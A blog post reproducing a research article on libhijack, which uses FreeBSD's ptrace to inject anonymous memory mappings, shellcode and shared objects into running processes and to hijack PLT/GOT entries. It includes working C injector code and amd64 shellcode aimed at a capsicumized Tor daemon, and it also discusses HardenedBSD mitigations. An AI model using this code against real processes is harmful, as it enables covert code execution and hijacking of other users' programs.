libhijack in PoC||GTFO 0x17!

It is with pride and pleasure that we announce that SoldierX's libhijack was featured in PoC||GTFO 0x17. Shawn Webb, the author of both libhijack and the article, spent months writing the article and taking it through a private peer review process.

The unedited version is posted below. The full issue can be found here (warning: large polyglot PDF). I hope you enjoy the article.

Hijacking Your Free Beasties

In the land of red devils known as Beasties exists a system devoid of
meaningful exploit mitigations. As we explore this vast land of
opportunity, we will meet our ELFish friends, [p]tracing their very
moves in order to hijack them. Since unprivileged process debugging is
enabled by default on FreeBSD, we can abuse PTrace to create anonymous
memory mappings, inject code into them, and overwrite PLT/GOT entries.
We will revive a tool called libhijack to make our nefarious
activities of hijacking ELFs via PTrace relatively easy.

Nothing presented here is technically new. However, this type of work
has not been documented in this much detail, tying it all into one
cohesive work. In Phrack 56, Silvio Cesare taught us ELF research
enthusiasts how to hook the PLT/GOT. The Phrack 59 article on Runtime
Process Infection briefly introduces the concept of injecting shared
objects by injecting shellcode via PTrace that calls dlopen(). No
other piece of research, however, has discovered the joys of forcing
the application to create anonymous memory mappings in which to inject
code.

This is only part one of a series of planned articles that will follow
libhijack's development. The end goal is to be able to anonymously
inject shared objects. The libhijack project is maintained by the
SoldierX community.

Previous Research

All prior work injects code into the stack, the heap, or existing
executable code. All three methods create issues on today's systems.
On amd64 and arm64, the two architectures libhijack cares about, the
stack is non-executable by default. jemalloc, the heap implementation
on FreeBSD, creates non-executable mappings. Obviously overwriting
existing executable code destroys a part of the executable image.

PLT/GOT redirection attacks have proven extremely useful, so much so
that RELRO is a standard mitigation on hardened systems. Thankfully
for us as attackers, FreeBSD doesn't use read only relocations. And
even if FreeBSD did, using PTrace to do devious things negates RELRO
as PTrace gives us God-like capabilities. We will see the strength of
PaX NOEXEC in HardenedBSD, preventing PLT/GOT redirections and
executable code injections.

The Role of ELF

FreeBSD provides a nifty API for inspecting the entire virtual memory
space of an application. The results returned from the API tell us
the protection flags (readable, writable, executable) of each mapping.
If FreeBSD provides such a rich API, why would we need to parse the
ELF headers?

We want to ensure that we find the address of the system call
instruction ("syscall" on amd64, "svc 0" on arm64) in a valid memory
location. We want to ensure the proper alignment restrictions are met
(amd64: 1 byte, arm64: 8 bytes). Ensuring proper alignment is
important. If the execution is redirected to an improperly aligned
instruction, the CPU will abort the application (SIGBUS or SIGILL will
be raised on FreeBSD). Intel-based architectures, like amd64, do not
care about instruction alignment, hence the 1 byte alignment described
above.

With a bit of additional work, we can also ensure that the mmap
syscall is called from the mmap libc function. Though such an
algorithm isn't currently implemented, doing so would be trivial.

PLT/GOT hijacking requires parsing ELF headers. One would not be able
to find the PLT/GOT without iterating through the Program Headers to
find the Dynamic Headers, eventually ending up with the DT_PLTGOT
entry.
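
The header walk just described can be sketched in a few lines. This is
a minimal illustration, not libhijack's code: it assumes a 64-bit ELF
object, the standard <elf.h> definitions, and that the program headers
and the dynamic section have already been copied into local memory.
The helper names find_dynamic_phdr and find_pltgot are hypothetical.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

/* Return the PT_DYNAMIC program header, or NULL if there is none. */
const Elf64_Phdr *
find_dynamic_phdr(const Elf64_Phdr *phdrs, size_t phnum)
{
	size_t i;

	assert(phdrs != NULL);
	for (i = 0; i < phnum; i++) {
		if (phdrs[i].p_type == PT_DYNAMIC)
			return (&phdrs[i]);
	}
	return (NULL);
}

/*
 * Walk a dynamic section (terminated by DT_NULL) and return the value of
 * its DT_PLTGOT entry, or 0 if the entry is absent.
 */
uint64_t
find_pltgot(const Elf64_Dyn *dyn)
{
	assert(dyn != NULL);
	for (; dyn->d_tag != DT_NULL; dyn++) {
		if (dyn->d_tag == DT_PLTGOT)
			return (dyn->d_un.d_ptr);
	}
	return (0);
}
```

In a remote process, the p_vaddr of the PT_DYNAMIC header tells us
where to read the dynamic section from before calling find_pltgot.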

We make heavy use of the Struct_Obj_Entry structure, a pointer to which
is stored in the second PLT/GOT entry. Indeed, in a future version of
libhijack, we
will likely handcraft our own Struct_Obj_Entry object and insert that
into the real RTLD in order to allow the shared object to resolve
symbols via normal methods.

Thus, involving ELF early on through the process works to our
advantage. With FreeBSD's libprocstat API, we don't have a need for
parsing ELF headers until we get to the PLT/GOT stage, but doing so
early makes it easier for the attacker using libhijack. libhijack does
all the heavy lifting.

Finding the Base Address

Executables come in two flavors: Position-Independent Executables
(PIEs) or regular executables. Since FreeBSD does not have any form of
address space randomization (ASR or ASLR), FreeBSD does not ship any
application built as a PIE.

Because the base address of an application can change depending on
architecture, compiler/linker flags, and PIE status, libhijack needs
to find a way to determine the base address of the executable. The
base address contains the main ELF headers.

libhijack uses the libprocstat API to find the base address. The
following table shows default load addresses for PIEs and non-PIEs on
amd64 and arm64:

| Arch  |        PIE         |      non-PIE       |
| amd64 | 0x0000000001021000 | 0x0000000000200000 |
| arm64 | 0x0000000000100000 | 0x0000000000010000 |

libhijack will loop through all the memory mappings as returned by the
libprocstat API. Only the first page of each mapping is read
in--enough to check for ELF headers. If the ELF headers are found,
then libhijack assumes that the first ELF object is that of the
application.

static int
resolve_base_address(HIJACK *hijack)
{
	struct procstat *ps;
	struct kinfo_proc *p;
	struct kinfo_vmentry *vm;
	unsigned int i, cnt;
	int err;
	ElfW(Ehdr) *ehdr;

	vm = NULL;
	p = NULL;
	err = ERROR_NONE;
	cnt = 0;

	ps = procstat_open_sysctl();
	if (ps == NULL) {
		SetError(hijack, ERROR_SYSCALL);
		return (-1);
	}

	p = procstat_getprocs(ps, KERN_PROC_PID, hijack->pid, &cnt);
	if (cnt == 0) {
		err = ERROR_SYSCALL;
		goto error;
	}

	cnt = 0;
	vm = procstat_getvmmap(ps, p, &cnt);
	if (cnt == 0) {
		err = ERROR_SYSCALL;
		goto error;
	}

	for (i = 0; i < cnt; i++) {
		/* Only file-backed mappings can hold an ELF image. */
		if (vm[i].kve_type != KVME_TYPE_VNODE)
			continue;

		/* Read just the first page: enough for the ELF header. */
		ehdr = read_data(hijack,
		    (unsigned long)(vm[i].kve_start),
		    getpagesize());
		if (ehdr == NULL) {
			goto error;
		}
		if (IS_ELF(*ehdr)) {
			hijack->baseaddr = (unsigned long)(vm[i].kve_start);
			break;
		}
	}

	if (hijack->baseaddr == (unsigned long)NULL)
		err = ERROR_NEEDED;

error:
	if (vm != NULL)
		procstat_freevmmap(ps, vm);
	if (p != NULL)
		procstat_freeprocs(ps, p);
	procstat_close(ps);
	return (err);
}
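
The test applied to each mapping's first page can be looked at in
isolation. The following is a small sketch under stated assumptions:
the pages have already been copied into local buffers, and the names
page_is_elf and first_elf_mapping are hypothetical helpers rather than
libhijack functions. It only checks the four ELF magic bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* The four magic bytes that open every ELF header: 0x7f 'E' 'L' 'F'. */
static const unsigned char elf_magic[4] = { 0x7f, 'E', 'L', 'F' };

/* Return 1 if the buffer begins with the ELF magic, 0 otherwise. */
int
page_is_elf(const unsigned char *page, size_t len)
{
	assert(page != NULL);
	if (len < sizeof(elf_magic))
		return (0);
	return (memcmp(page, elf_magic, sizeof(elf_magic)) == 0);
}

/*
 * Given the first bytes of each mapping, return the index of the first
 * one that looks like an ELF object, or -1 if none does.
 */
int
first_elf_mapping(const unsigned char *const *pages, const size_t *lens,
    size_t n)
{
	size_t i;

	for (i = 0; i < n; i++) {
		if (page_is_elf(pages[i], lens[i]))
			return ((int)i);
	}
	return (-1);
}
```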

Assuming that the first ELF object is the application itself, though,
can cause libhijack to break in some corner cases. One such corner
case is when the RTLD is used to execute the application. For example,
instead of calling /bin/ls directly, the user may choose to call
/libexec/ /bin/ls. Doing so causes libhijack to not find
the PLT/GOT and fail early sanity checks. This can be worked around
by telling libhijack the base address to use instead of attempting
to detect it automatically.

The RTLD in FreeBSD only recently gained the ability to execute
applications directly. Thus, assuming that the first ELF object is the
application is generally safe.

Finding the syscall

As mentioned above, we want to ensure with 100% certainty we're
calling into the kernel from an executable memory mapping and in an
allowed location. The ELF headers tell us all the publicly accessible
functions loaded by a given ELF object.

The application itself may never call into the kernel directly.
Instead, it will rely on shared libraries to do that. The read()
system call is a perfect example. Reading data from a file descriptor
is a privileged operation that requires help from the kernel. The
read() libc function calls the read syscall.

libhijack iterates through the ELF headers, following this pseudocode:

1. Locate the first Obj_Entry structure, the head of a linked list
   that describes the loaded shared objects.
2. Iterate through the symbol table for the shared object:
   2.1. If the symbol is not a function, continue to the next symbol
        or break out if no more symbols.
   2.2. Read the symbol's payload into memory. Scan it for the syscall
        opcode modulo instruction alignment.
   2.3. If the instruction alignment is off, continue scanning the
        function.
   2.4. If the syscall opcode is found and the instruction alignment
        requirements are met, return the address of the system call.
3. Restart step #2 with the next Obj_Entry linked list node.
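
Steps 2.2 through 2.4 can be sketched on a local copy of a function
body. This is an illustration only and assumes the bytes have already
been read out of the target; find_opcode is a hypothetical name. The
opcode bytes are the in-memory encodings of "syscall" on amd64 and
"svc 0" on arm64.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Opcode bytes as they appear in memory (little-endian for arm64). */
const uint8_t amd64_syscall[2] = { 0x0f, 0x05 };		/* syscall */
const uint8_t arm64_svc0[4] = { 0x01, 0x00, 0x00, 0xd4 };	/* svc 0 */

/*
 * Scan a local copy of a function body for an opcode. "vaddr" is the
 * address of buf[0] in the target process. Returns the target address of
 * the first match that satisfies the alignment, or 0 if there is none.
 */
uint64_t
find_opcode(const uint8_t *buf, size_t len, uint64_t vaddr,
    const uint8_t *op, size_t oplen, unsigned int align)
{
	size_t off;

	assert(align != 0 && oplen != 0);
	for (off = 0; off + oplen <= len; off++) {
		if ((vaddr + off) % align != 0)
			continue;	/* step 2.3: misaligned, keep scanning */
		if (memcmp(buf + off, op, oplen) == 0)
			return (vaddr + off);	/* step 2.4 */
	}
	return (0);
}
```

With an alignment of 1 every offset is a candidate. With a larger
alignment, matches at misaligned addresses are skipped.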

The above algorithm is implemented using a series of callbacks. This
is to encourage an internal API that is flexible and scalable to
different situations.
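
The callback pattern itself is simple. The sketch below is a
stripped-down illustration: struct sym, walk_symbols, and match_name
are hypothetical stand-ins, and only the CONTPROC and TERMPROC names
are borrowed from libhijack. A callback returns TERMPROC to stop the
walk early and CONTPROC to keep going.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Callback verdicts, mirroring the names used by libhijack. */
enum cb_result { CONTPROC, TERMPROC };

/* Hypothetical, simplified symbol record for illustration only. */
struct sym {
	const char	*name;
	unsigned long	 vaddr;
	int		 is_func;
};

typedef enum cb_result (*sym_callback)(const struct sym *, void *);

/*
 * Visit every function symbol until a callback returns TERMPROC.
 * Returns the number of callbacks invoked.
 */
size_t
walk_symbols(const struct sym *syms, size_t n, sym_callback cb, void *arg)
{
	size_t i, calls;

	assert(cb != NULL);
	for (i = 0, calls = 0; i < n; i++) {
		if (!syms[i].is_func)
			continue;
		calls++;
		if (cb(&syms[i], arg) == TERMPROC)
			break;
	}
	return (calls);
}

/* Example callback: stop at the symbol whose name matches "arg". */
enum cb_result
match_name(const struct sym *s, void *arg)
{
	return (strcmp(s->name, (const char *)arg) == 0 ? TERMPROC : CONTPROC);
}
```

Swapping in a different callback changes what the walk looks for
without touching the iteration code.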

int
freebsd_parse_soe(HIJACK *hijack, struct Struct_Obj_Entry *soe, linkmap_callback callback)
{
    int err=0;
    ElfW(Sym) *libsym=NULL;
    unsigned long numsyms, symaddr=0, i=0;
    char *name;

    numsyms = soe->nchains;
    symaddr = (unsigned long)(soe->symtab);

    do {
        /* Release the symbol read on the previous iteration. */
        if ((libsym))
            free(libsym);

        libsym = (ElfW(Sym) *)read_data(hijack, (unsigned long)symaddr, sizeof(ElfW(Sym)));
        if (!(libsym)) {
            err = GetErrorCode(hijack);
            goto notfound;
        }

        /* Only functions can contain the syscall instruction. */
        if (ELF64_ST_TYPE(libsym->st_info) != STT_FUNC) {
            symaddr += sizeof(ElfW(Sym));
            continue;
        }

        name = read_str(hijack, (unsigned long)(soe->strtab + libsym->st_name));
        if ((name)) {
            if (callback(hijack, soe, name, ((unsigned long)(soe->mapbase) + libsym->st_value), (size_t)(libsym->st_size)) != CONTPROC) {
                free(name);
                break;
            }

            free(name);
        }

        symaddr += sizeof(ElfW(Sym));
    } while (i++ < numsyms);

notfound:
    SetError(hijack, err);
    return (err);
}

CBRESULT
syscall_callback(HIJACK *hijack, void *linkmap, char *name, unsigned long vaddr, size_t sz)
{
	unsigned long syscalladdr;
	unsigned int align;
	size_t left, skip;

	align = GetInstructionAlignment();
	left = sz;
	while (left > sizeof(SYSCALLSEARCH) - 1) {
		syscalladdr = search_mem(hijack, vaddr, left, SYSCALLSEARCH, sizeof(SYSCALLSEARCH)-1);
		if (syscalladdr == (unsigned long)NULL)
			break;

		if ((syscalladdr % align) == 0) {
			hijack->syscalladdr = syscalladdr;
			return TERMPROC;
		}

		/*
		 * Misaligned match: resume just past it. Shrink the
		 * remaining length by the same amount the address advances.
		 */
		skip = (syscalladdr - vaddr) + sizeof(SYSCALLSEARCH)-1;
		left -= skip;
		vaddr += skip;
	}

	return CONTPROC;
}

int
LocateSystemCall(HIJACK *hijack)
{
	Obj_Entry *soe, *next;

	if (IsAttached(hijack) == false)
		return (SetError(hijack, ERROR_NOTATTACHED));

	if (IsFlagSet(hijack, F_DEBUG))
		fprintf(stderr, "[*] Looking for syscall\n");

	soe = hijack->soe;
	do {
		freebsd_parse_soe(hijack, soe, syscall_callback);
		next = TAILQ_NEXT(soe, next);
		/* The first entry is owned by the hijack context. */
		if (soe != hijack->soe)
			free(soe);
		if (hijack->syscalladdr != (unsigned long)NULL)
			break;
		soe = read_data(hijack,
		    (unsigned long)next,
		    sizeof(*soe));
	} while (soe != NULL);

	if (hijack->syscalladdr == (unsigned long)NULL) {
		if (IsFlagSet(hijack, F_DEBUG))
			fprintf(stderr, "[-] Could not find the syscall\n");
		return (SetError(hijack, ERROR_NEEDED));
	}

	if (IsFlagSet(hijack, F_DEBUG))
		fprintf(stderr, "[+] syscall found at 0x%016lx\n",
		    hijack->syscalladdr);

	return (SetError(hijack, ERROR_NONE));
}

Creating a new memory mapping

Now that we have found the syscall, we can force the application to
call mmap. amd64 and arm64 take slightly different approaches to
calling mmap. On amd64, we simply set the registers, including setting
the instruction pointer, to their respective values. On arm64, we must
wait until the application attempts to call a system call, then set
the registers to their respective values.

Finally, in both cases, we continue execution, waiting for mmap to
finish. Once mmap finishes, we should have our new mapping. mmap will
store the start address of the new memory mapping in rax on amd64 and
x0 on arm64. We save this address, restore the registers back to their
previous values, and return the address back to the user.
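
For reference, the call the target is made to issue has the same shape
as an ordinary in-process anonymous mmap. The sketch below performs
that call locally rather than through PTrace; map_anonymous is a
hypothetical helper, and the _DEFAULT_SOURCE guard is only an
assumption about what some C libraries need in order to expose
MAP_ANON.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE	/* asks glibc to expose MAP_ANON; harmless elsewhere */
#endif
#include <sys/mman.h>

#include <assert.h>
#include <stddef.h>

/*
 * Create an anonymous, private mapping of "len" bytes. Returns the start
 * address, or MAP_FAILED on error, exactly as mmap(2) does. An anonymous
 * mapping has no backing file, hence fd = -1 and offset = 0.
 */
void *
map_anonymous(size_t len, int prot)
{
	assert(len != 0);
	return (mmap(NULL, len, prot, MAP_ANON | MAP_PRIVATE, -1, 0));
}
```

The return value plays the same role as the address libhijack reads
back from the target's return register.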

Below is a handy dandy table for the registers we set:

|  arch   | register |      value     |
|  amd64  |    rax   | syscall number |
|  amd64  |    rdi   |      addr      |
|  amd64  |    rsi   |     length     |
|  amd64  |    rdx   |      prot      |
|  amd64  |    r10   |      flags     |
|  amd64  |    r8    |     fd (-1)    |
|  amd64  |    r9    |   offset (0)   |
| aarch64 |    x0    | syscall number |
| aarch64 |    x1    |      addr      |
| aarch64 |    x2    |     length     |
| aarch64 |    x3    |      prot      |
| aarch64 |    x4    |      flags     |
| aarch64 |    x5    |     fd (-1)    |
| aarch64 |    x6    |   offset (0)   |
| aarch64 |    x8    |   terminator   |

Currently, fd and offset are hardcoded to -1 and 0 respectively. The
point of libhijack is to use anonymous memory mappings. When mmap
returns, it will place the start address of the new memory mapping in
rax on amd64 and x0 on arm64.
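
The amd64 half of the table can be expressed as a small lookup from a
role name to a register. This is a sketch, not libhijack's
implementation: struct amd64_regs, set_register, and prepare_mmap are
hypothetical, and the syscall number is passed in by the caller rather
than assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical register file: only the amd64 registers from the table. */
struct amd64_regs {
	uint64_t rax, rdi, rsi, rdx, r10, r8, r9, rip;
};

/* Store "value" in the register that plays "role"; -1 if role is unknown. */
int
set_register(struct amd64_regs *r, const char *role, uint64_t value)
{
	static const char *const roles[] = {
		"syscall", "arg0", "arg1", "arg2", "arg3", "arg4", "arg5"
	};
	uint64_t *slots[] = {
		&r->rax, &r->rdi, &r->rsi, &r->rdx, &r->r10, &r->r8, &r->r9
	};
	size_t i;

	assert(role != NULL);
	for (i = 0; i < sizeof(roles) / sizeof(roles[0]); i++) {
		if (strcmp(role, roles[i]) == 0) {
			*slots[i] = value;
			return (0);
		}
	}
	return (-1);
}

/* Fill in every register needed for an anonymous mmap. */
void
prepare_mmap(struct amd64_regs *r, uint64_t sysno, uint64_t syscall_addr,
    uint64_t addr, uint64_t len, uint64_t prot, uint64_t flags)
{
	set_register(r, "syscall", sysno);
	r->rip = syscall_addr;			/* resume at the located syscall */
	set_register(r, "arg0", addr);
	set_register(r, "arg1", len);
	set_register(r, "arg2", prot);
	set_register(r, "arg3", flags);
	set_register(r, "arg4", (uint64_t)-1);	/* fd */
	set_register(r, "arg5", 0);		/* offset */
}
```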

The implementation of md_map_memory for amd64 looks like this:

unsigned long
md_map_memory(HIJACK *hijack, struct mmap_arg_struct *mmap_args)
{
	REGS regs_backup, *regs;
	unsigned long addr, ret;
	register_t stackp;
	int err, status;

	ret = (unsigned long)NULL;
	err = ERROR_NONE;
	regs = _hijack_malloc(hijack, sizeof(REGS));
	/* Snapshot the registers so they can be restored afterwards. */
	if (ptrace(PT_GETREGS, hijack->pid, (caddr_t)regs, 0) < 0) {
		err = ERROR_SYSCALL;
		goto end;
	}
	memcpy(&regs_backup, regs, sizeof(REGS));

	SetRegister(regs, "syscall", MMAPSYSCALL);
	SetInstructionPointer(regs, hijack->syscalladdr);
	SetRegister(regs, "arg0", mmap_args->addr);
	SetRegister(regs, "arg1", mmap_args->len);
	SetRegister(regs, "arg2", mmap_args->prot);
	SetRegister(regs, "arg3", mmap_args->flags);
	SetRegister(regs, "arg4", -1); /* fd */
	SetRegister(regs, "arg5", 0); /* offset */

	if (ptrace(PT_SETREGS, hijack->pid, (caddr_t)regs, 0) < 0) {
		err = ERROR_SYSCALL;
		goto end;
	}

	/* time to run mmap */
	addr = MMAPSYSCALL;
	/* Step until the return register no longer holds the syscall number. */
	while (addr == MMAPSYSCALL) {
		if (ptrace(PT_STEP, hijack->pid, (caddr_t)0, 0) < 0)
			err = ERROR_SYSCALL;
		do {
			waitpid(hijack->pid, &status, 0);
		} while (!WIFSTOPPED(status));

		ptrace(PT_GETREGS, hijack->pid, (caddr_t)regs, 0);
		addr = GetRegister(regs, "ret");
	}

	if ((long)addr == -1) {
		if (IsFlagSet(hijack, F_DEBUG))
			fprintf(stderr, "[-] Could not map address. Calling mmap failed!\n");
		ptrace(PT_SETREGS, hijack->pid, (caddr_t)(&regs_backup), 0);
		err = ERROR_SYSCALL;
		goto end;
	}

	/* Put the original registers back. */
	if (ptrace(PT_SETREGS, hijack->pid, (caddr_t)(&regs_backup), 0) < 0)
		err = ERROR_SYSCALL;
	if (err == ERROR_NONE)
		ret = addr;
end:
	SetError(hijack, err);
	return (ret);
}

Even though we're going to write to the memory mapping, the protection
level doesn't need to have the write flag set. Remember, with PTrace,
we're gods. FreeBSD will allow us to write to the memory mapping via
PTrace, even if that memory mapping is non-writable.

HardenedBSD, a derivative of FreeBSD, prevents the creation of memory
mappings that are both writable and executable. If a user attempts to
create a memory mapping that is both writable and executable, the
execute bit will be dropped. Similarly, HardenedBSD prevents
upgrading a writable memory mapping to executable with mprotect.
HardenedBSD places these same restrictions on PTrace. As a result,
libhijack is completely mitigated in HardenedBSD.
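
The two rules described above can be modeled as a pair of predicates.
This is a deliberately simplified model of the prose, not HardenedBSD's
implementation; the names noexec_filter_mmap and noexec_allow_mprotect
are hypothetical.

```c
#include <sys/mman.h>

#include <assert.h>

/*
 * Model of the mmap rule: a request for a mapping that is both writable
 * and executable loses its execute bit.
 */
int
noexec_filter_mmap(int prot)
{
	assert((prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC)) == 0);
	if ((prot & PROT_WRITE) && (prot & PROT_EXEC))
		prot &= ~PROT_EXEC;
	return (prot);
}

/*
 * Model of the mprotect rule: a mapping that is currently writable may
 * not be upgraded to executable. Returns 1 if allowed, 0 if refused.
 */
int
noexec_allow_mprotect(int cur_prot, int new_prot)
{
	if ((cur_prot & PROT_WRITE) && (new_prot & PROT_EXEC))
		return (0);
	return (1);
}
```

Under this model, the read and execute mapping libhijack asks for is
still granted, but there is no longer any way to write code into it.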

Hijacking the PLT/GOT

Now that we have an anonymous memory mapping we can inject code into,
it's time to look at hijacking the Procedure Linkage Table/Global
Offset Table. PLT/GOT hijacking only works for symbols that have been
resolved by the RTLD in advance. Thus, if the function you want to
hijack has not been called, its address will not be in the PLT/GOT
unless BIND_NOW is active.

The application itself contains its own PLT/GOT. Each shared object it
depends on has its own PLT/GOT as well. For example, libpcap requires
libc. libpcap calls functions in libc and thus needs its own linkage
table to resolve libc functions at runtime.

This is why parsing the ELF headers in search of functions that
contain the system call, as detailed above, works to our advantage. Along
the way, we get to know certain pieces of info, like where the PLT/GOT
is. libhijack will cache that information along the way.

In order to hijack PLT/GOT entries, we need to know two pieces of
information: the address of the PLT/GOT entry we want to hijack and
the address to point it to. Luckily, libhijack has an API for
resolving functions and their locations in the PLT/GOT.

Once we have those two pieces of information, then hijacking the GOT
entry is simple and straightforward. We just replace the entry in the
GOT with the new address. Ideally, the injected code would first
stash the original address for later use.
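
The swap-and-stash idea can be demonstrated without PTrace by treating
a table of function pointers as a stand-in for a resolved GOT. This is
an in-process sketch only; struct fake_got, hijack_slot, and the
example functions are hypothetical and are not libhijack's API.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*func_t)(int);

/* Stand-in for a resolved GOT: a table of function addresses. */
struct fake_got {
	func_t	slots[4];
};

/*
 * Point slot "idx" at "replacement" and hand back the original address so
 * the injected code can still reach the real function.
 */
func_t
hijack_slot(struct fake_got *got, size_t idx, func_t replacement)
{
	func_t original;

	assert(got != NULL && idx < 4);
	original = got->slots[idx];
	got->slots[idx] = replacement;
	return (original);
}

/* Where the hook keeps the address it displaced. */
func_t saved_original;

/* The "real" function and a hook that calls through to it. */
int
real_double(int x)
{
	return (2 * x);
}

int
hooked_double(int x)
{
	return (saved_original(x) + 1);
}
```

Every caller that goes through the table now reaches the hook, while
the hook itself can still call the original through the saved address.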

Case Study: Tor Capsicumization

Capsicum is a capabilities framework for FreeBSD. It's commonly used
to implement application sandboxing. HardenedBSD is actively working
on integrating Capsicum for Tor. Tor currently supports a sandboxing
methodology that is wholly incompatible with Capsicum. Tor's
sandboxing model uses seccomp2, a filtering-based sandbox. When Tor
starts up, Tor tells its sandbox initialization routines to whitelist
certain resources followed by activation of the sandbox. Tor then can
call open(2), stat(2), etc. as needed on an on-demand basis.

In order to prevent a full rewrite of Tor to handle Capsicum,
HardenedBSD has opted to use wrappers around so-called "privileged
operation" function calls (i.e., open(2), stat(2), etc.). Thus, open(2)
becomes sandbox_open().

Prior to entering capabilities mode (capmode for short), Tor will
pre-open any directories within which it expects to open files. Any
time Tor expects to open a file, it will call openat rather than open.
Thus, Tor is limited to using files within the directories it uses.
For this reason, we will place the shared object within Tor's data
directory. This is not unreasonable, since we either must be root or
running as the same user as the tor daemon in order to use libhijack
against it.
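
The pre-opened directory pattern can be sketched with plain openat(2).
The wrapper below is hypothetical and is not Tor's or HardenedBSD's
sandbox_open. In capabilities mode the kernel enforces the confinement;
here, as an assumption for illustration, the wrapper refuses absolute
paths and any name containing ".." itself.

```c
#include <assert.h>
#include <fcntl.h>
#include <string.h>

/*
 * Open "name" relative to a directory descriptor that was opened before
 * the sandbox was entered. Absolute paths and names containing ".." are
 * refused up front, since they could escape the pre-opened directory.
 */
int
open_beneath(int dirfd, const char *name, int flags)
{
	assert(name != NULL);
	if (name[0] == '/' || strstr(name, "..") != NULL)
		return (-1);
	return (openat(dirfd, name, flags));
}
```

A shared object dropped into the data directory passes this check like
any other file there, which is why the directory makes a convenient
staging area.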

Note that as of the time of this writing, the Capsicum patch to Tor
has not landed upstream and is in a separate repository. The
work-in-progress code can be found here:

Since FreeBSD does not implement any meaningful exploit mitigation
outside of arguably ineffective stack cookies, an attacker can abuse
memory corruption vulnerabilities to use ret2libc style attacks
against wrapper-style capsicumized applications with 100% reliability.
Instead of ret2open, all the attacker needs to do is ret2sandbox_open.
Without exploit mitigations like PaX ASLR, PaX NOEXEC, and/or CFI, the
following code can be used copy/paste style, allowing for mass
exploitation without payload modification.

To illustrate the need for ASLR and NOEXEC, we will use libhijack to
emulate a vulnerability exploitation resulting in a control flow
hijack. Note that because we use libhijack, we bypass the forward-edge
guarantees CFI gives us. LLVM's implementation of CFI does not include
backward-edge guarantees. We could gain backward-edge guarantees
through SafeStack; however, Tor immediately crashes when compiled with
both CFI and SafeStack.

In the following code snippet, we perform the following:

1. We attach to the victim process.
2. We create an anonymous memory allocation with read and execute
   privileges.
3. We write the filename that we'll pass to sandbox_open() into the
   beginning of the allocation.
4. We inject the shellcode into the allocation, just after the
   filename.
5. We execute the shellcode and detach from the process.
6. The following pertains now to the shellcode:
7. We call sandbox_open. The address is hardcoded and can be reused
   among like systems.
8. We save the return value of sandbox_open, which will be the opened
   file descriptor.
9. We pass the file descriptor to fdlopen. The address of fdlopen is
   hardcoded and can be reused on like systems.
10. The RTLD loads the shared object.
    10.1. Part of loading is calling any initialization routines. In
          this case, a simple string is printed to the console.
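
The layout produced by steps 3 and 4 can be sketched on a local staging
buffer. This is an illustration under stated assumptions: stage_payload
is a hypothetical helper, and the buffer stands in for the remote
mapping that libhijack writes to.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Lay out the payload the same way the steps above lay it out in the
 * remote mapping: the NUL-terminated filename first, the shellcode
 * immediately after it. On success, returns the offset of the shellcode;
 * returns (size_t)-1 if the buffer is too small.
 */
size_t
stage_payload(uint8_t *buf, size_t buflen, const char *filename,
    const uint8_t *code, size_t codelen)
{
	size_t namelen;

	assert(buf != NULL && filename != NULL && code != NULL);
	namelen = strlen(filename) + 1;	/* include the terminating NUL */
	if (namelen > buflen || codelen > buflen - namelen)
		return ((size_t)-1);
	memcpy(buf, filename, namelen);
	memcpy(buf + namelen, code, codelen);
	return (namelen);
}
```

Because the filename sits at the very start of the mapping, the
shellcode can refer to it by the mapping's fixed address.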

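/* main.c */
#include <sys/types.h>
#include <sys/mman.h>

#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include "hijack.h"

#define	MMAP_HINT	 0x4000UL

void
usage(char *name)
{
	fprintf(stderr, "USAGE: %s <pid> <shellcode> <so>\n", name);
	exit(1);
}

int
main(int argc, char *argv[])
{
	unsigned long addr, ptr;
	HIJACK *ctx;

	if (argc != 4)
		usage(argv[0]);

	ctx = InitHijack(F_DEFAULT);
	AssignPid(ctx, (pid_t)atoi(argv[1]));

	if (Attach(ctx)) {
		fprintf(stderr, "[-] Could not attach!\n");
		exit(1);
	}

	/* MapMemory needs the address of a syscall instruction. */
	LocateSystemCall(ctx);

	/* Read + execute, fixed at MMAP_HINT so the shellcode can hardcode it. */
	addr = MapMemory(ctx, MMAP_HINT, getpagesize(),
	    PROT_READ | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE);
	if (addr == (unsigned long)-1) {
		fprintf(stderr, "[-] Could not map memory!\n");
		Detach(ctx);
		exit(1);
	}

	ptr = addr;

	/* Filename first, shellcode right after its terminating NUL. */
	WriteData(ctx, addr, argv[3], strlen(argv[3])+1);
	ptr += strlen(argv[3]) + 1;
	InjectShellcodeAndRun(ctx, ptr, argv[2], true);

	Detach(ctx);

	return (0);
}
/* end of main.c */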

/* sandbox_fdlopen.asm */

mov rbp, rsp

; Save registers
push rdi
push rsi
push rdx
push rcx
push rax

; Call sandbox_open
mov rdi, 0x4000
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
mov rax, 0x00000000011c4070 ; Address of sandbox_open
call rax

; Call fdlopen
mov rdi, rax
mov rsi, 0x101
mov rax, 0x8014c3670 ; Address of fdlopen
call rax

; Restore registers
pop rax
pop rcx
pop rdx
pop rsi
pop rdi

mov rsp, rbp
/* end of sandbox_fdlopen.asm */

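/* testso.c */
#include <stdio.h>

/* The function name is arbitrary; the RTLD runs it because of the attribute. */
__attribute__((constructor)) void
init(void)
{
        printf("This output is from an injected shared object. You have been pwned.\n");
}
/* end of testso.c */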

Output of Tor:

Oct 04 18:59:25.976 [notice] Tor running on FreeBSD with Libevent 2.1.8-stable, OpenSSL 1.0.2k-freebsd, Zlib 1.2.11, Liblzma N/A, and Libzstd N/A.                   
Oct 04 18:59:25.976 [notice] Tor can't help you if you use it wrong! Learn how to be safe at                                  
Oct 04 18:59:25.976 [notice] This version is not a stable Tor release. Expect more bugs than usual.                                                                                
Oct 04 18:59:25.977 [notice] Read configuration file "/home/shawn/installs/etc/tor/torrc".                                                                                         
Oct 04 18:59:25.982 [notice] Scheduler type KISTLite has been enabled.                   
Oct 04 18:59:25.982 [notice] Opening Socks listener on                    
